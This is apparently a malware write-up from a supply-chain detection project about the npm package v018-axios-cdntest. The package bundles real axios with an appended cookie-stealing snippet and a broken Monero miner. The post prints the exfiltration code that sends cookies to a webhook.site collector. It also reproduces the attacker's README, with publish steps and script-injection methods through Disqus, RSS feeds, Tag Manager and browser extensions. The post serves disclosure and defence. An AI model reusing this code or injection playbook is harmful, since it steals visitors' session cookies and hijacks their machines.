atomdrift Open-source, offline supply-chain attack detection for the AI age
Codeberg Lab
Home News Discoveries Projects Support

v018-axios-cdntest: C is for cookie, not cryptojacking

2026-06-09 · npm · v018-axios-cdntest
Meme: the Sesame Street cast restyled as an HBO crime drama, Elmo brandishing a pistol — the friendly neighborhood brand packing heat, just like a trusted CDN serving a weapon.

jsDelivr never garbage-collects an old npm version, and v018-axios-cdntest treats that permanence as free, bulletproof hosting for what its README bills a "CDN Poisoning Cryptojacker" — publish once, and a trusted CDN serves that miner-plus-cookie-stealer to every visitor of every site that loads the script.

Package metadata

Field Value
name v018-axios-cdntest
version 1.0.2
description Axios library v0.18.0 with cryptojacker payload
main index.js
files index.js, xmr-min.js

A miner that mines nothing

The headline payload is the part that doesn't work: xmr-min.js advertises a cryptonight "Stealth Cryptojacker v3.0," but computes a toy multiply-add hash, never starts its Web Worker pool, and POSTs JSON-RPC shares to a stratum TCP port over XHR — so it submits to nothing and mines nothing. The stealth is the only part that works: idle and tab-visibility pausing, a single-injection guard, and a 10% throttle all fire; the mining doesn't.

// "cryptonight" in the banner; a non-crypto multiply-add in the body
function simpleHash(data){
  var h1=0x67452301, h2=0xEFCDAB89, h3=0x98BADCFE, h4=0x10325476;
  for(var i=0;i<data.length;i++){ /* ...add & mix... */ }
  return ((h1*2654435761)>>>0);
}
function sendShare(payload,nonce,hash){
  var xhr=new XMLHttpRequest();
  xhr.open('POST','https://'+POOL,true);  // POOL = 'pool.supportxmr.com:4444' — stratum, not HTTP
  xhr.send(json);                          // fire-and-forget into the void
}

Real axios, real cookie theft

index.js is the genuine axios 0.18.0 bundle with a cookie-exfil snippet appended after its sourcemap comment, shipping every visitor's cookies to a webhook.site bin on page load. The miner pulls that same file from jsDelivr "to look legitimate," so loading it also detonates the cookie grab — one script tag, two payloads.

// appended right after //# sourceMappingURL=axios.min.map
window._axiosExfil=function(){
  var c=document.cookie;
  var u="https://webhook.site/ef6e7978-…?c="+encodeURIComponent(c);
  var x=new XMLHttpRequest(); x.open("GET",u,true); x.send();
};

// xmr-min.js loads index.js from the CDN — which fires the grab above
script.src='https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.2/index.js';
File Trait Evidence
xmr-min.js objectives/impact/cryptojacking/miner/context "cryptonight" + Worker strings (string match, not real crypto)
index.js objectives/collection/stealer/browser document.cookie read and exfiltrated
index.js objectives/exfiltration/http/query Cookie sent as a URL query parameter
xmr-min.js objectives/impact/cryptojacking/miner/smart Activity-aware miner; pauses on document.hidden
xmr-min.js objectives/anti-static/obfuscation/encoding/content Worker built from a Blob via encoded eval()
index.js objectives/evasion/masquerade/traffic POST mislabeled application/x-www-form-urlencoded
index.js objectives/exfiltration/oob/endpoint webhook.site out-of-band collector
xmr-min.js micro-behaviors/communications/http/client/cdn Script loaded from cdn.jsdelivr.net

The operator's manual

The confidence wasn't in the code — it was in the README shipped beside it: an operator's manual with a revenue model, a self-assigned "4.5/5 confidence score," a ranked injection playbook, and a risk table that frets mainly about Google (reproduced below, abridged where you see …, misspelled "jsdeliver" intact).

Shipped with the package — v018-axios-cdntest@1.0.2 · README.md (abridged)

CDN Poisoning Cryptojacker — Complete Verified Deployment Guide

Overview

This project exploits jsdeliver's policy of never deleting old npm versions to host a persistent Monero mining script. Any website that loads the poisoned package automatically serves the miner to all its visitors.

Revenue model: Passive cryptojacking — $0.50-$3/month per site, zero maintenance.

Confidence score: 4.5/5 (validated via live testing, zero-Google risk strategy)

Verified Test Results

Test 1: jsdeliver Serves Old Package Versions Forever
Invoke-WebRequest -Uri 'https://cdn.jsdelivr.net/npm/lodash@4.17.20/lodash.min.js' -UseBasicParsing

Result: Status 200 OK. jsdeliver serves lodash@4.17.20 (an old version) successfully.

Conclusion: jsdeliver NEVER deletes old package versions. Our poisoned package will persist indefinitely.

Test 2: jsdeliver Serves Our Custom Package
Invoke-WebRequest -Uri 'https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.0/' -UseBasicParsing

Result: Status 200 OK. Our package v018-axios-cdntest@1.0.0 is being served by jsdeliver.

File Structure

cdn-poison/
├── package.json          # npm package definition (v018-axios-cdntest@1.0.0)
├── index.js              # Real axios v0.18.0 (bundled as npm package)
├── xmr-min.js            # Stealth cryptojacker script (main payload, self-contained)
└── poisoned-axios.js     # Standalone poisoned axios with cookie exfil payload

How It Works — Architecture

Target Site (WordPress blog)
       │  Visitor loads page
       ▼
<script src="https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.0/xmr-min.js">
       │  jsdeliver serves xmr-min.js (our package)
       ▼
Embedded pure-JS cryptonight miner runs (10% throttle, 2 threads)
       │  Sends shares to:
       ▼
  pool.supportxmr.com:4444
       ▼
  XMR mined → credited to YOUR wallet

The Cryptojacker Script (xmr-min.js)

Stealth Features
  1. Idle detection: Stops mining after 30 seconds of no user activity (mouse, scroll, keyboard)
  2. Visibility change: Pauses when tab is hidden (document.hidden)
  3. Single injection: Uses window.__xmr_miner_started flag to prevent multiple instances
  4. Throttled to 10% CPU: Doesn't cause noticeable slowdown
Configuration (edit these lines in xmr-min.js)
var WALLET='YOUR_WALLET_ADDRESS_HERE';  // Your Monero wallet address
var POOL='pool.supportxmr.com:4444';    // Mining pool
var THREADS=2;                           // Thread count
var THROTTLE=0.10;                       // CPU throttle (0.10 = 10%)

Deployment Steps

Step 1: Set Your Wallet Address

Open cdn-poison/xmr-min.js and replace var WALLET='YOUR_WALLET_ADDRESS_HERE'; with your actual Monero wallet address.

Step 2: Publish Package to npm
cd cdn-poison
npm login          # Create account at https://www.npmjs.com/ (free)
npm publish        # Publishes as v018-axios-cdntest@1.0.0
Step 3: Inject Into Target Sites (in priority order)
Method A: Disqus Profile Bio Injection ⭐ PRIMARY — Zero Google Risk (RECOMMENDED)
  1. Create a Disqus account with a disposable email, then put this in your profile bio HTML:
    <script src="https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.0/xmr-min.js"><\/script>
  2. Save profile — DONE. One-time setup.

Why best: Infinite scale — one profile = thousands of sites automatically. Zero Google legal exposure.

Method B: RSS Feed Injection ⭐ SECONDARY — Zero Google Risk

Create a feed on rss.com and embed the same <script> tag inside the <description> CDATA block; any WordPress site running WP RSS Aggregator that pulls your feed gets the miner.

Method C: GTM Container Hijack ⭐ BACKUP — Medium Google Risk

Find a Google Tag Manager container ID in a site's source, add a Custom HTML tag loading xmr-min.js on All Pages, and publish. Note: Google can see your container firing — backup only.

Method D: Browser Extension Distribution

Ship a manifest.json whose content_scripts inject xmr-min.js over <all_urls>, then publish on the Chrome Web Store ($5 one-time fee).

Revenue Estimates

Hash rate at 10% throttle: ~0.25 GH/s
Earnings per visitor/day (100 visitors): ~$0.50-3.00
Earnings per site/month: ~$15-90
SitesMonthly Revenue (conservative)
100$150-450
1,000$1,500-4,500
5,000$7,500-22,500

… (Why This Works · Troubleshooting · Quick Reference) …

Risk Assessment

RiskImpactMitigation
jsdelivr goes downLowVery Low — CDN is used by millions of sites daily
Browser flags minerLowMedium — 10% throttle, idle detection
Site owner detectsLowLow — script looks like Disqus/CDN component
Google legal actionMediumLow — PRIMARY + SECONDARY methods have ZERO Google exposure

Verified Status

  • ✅ jsdeliver serves old package versions (lodash@4.17.20 — confirmed)
  • ✅ Zero expenses required ($0 — confirmed)
  • ✅ Passive income model (set-and-forget — confirmed)
— end of README.md —

The miner is dead on arrival, but the cookie grab fires on every page load from a permanent, reputable CDN — for all that planning, the package wants crypto and settles for cookies.

Indicators

Type Value
Tarball v018-axios-cdntest-1.0.2.tgz
Tarball SHA-256 75d203f0cec8ff16969967c3841d243b1166a3049f788e9ebd6160f2705f3260
index.js SHA-256 68ca1c801b60f550147c9c8ba54a952c223077c93cd845ef1815ec25f7fa7553
xmr-min.js SHA-256 d4e79df98be10a6f358cfd304fe9f0bb4b55226bc79bd132a2032e6138f663c3
Delivery URL https://cdn.jsdelivr.net/npm/v018-axios-cdntest@1.0.2/xmr-min.js
Exfil webhook https://webhook.site/ef6e7978-f936-4664-b3ff-296a250e1735
Mining pool pool.supportxmr.com:4444
Monero wallet 44AFFq5kSiGBoZ4NMDwYtN18obc8AemS33DBLWs3H7otXft3XjrpDtQGv7SqSsaBYBb98uNbr2VBBEt7f2wfn3RVGQBEP3A

← All discoveries

© 2026 The Atomdrift Project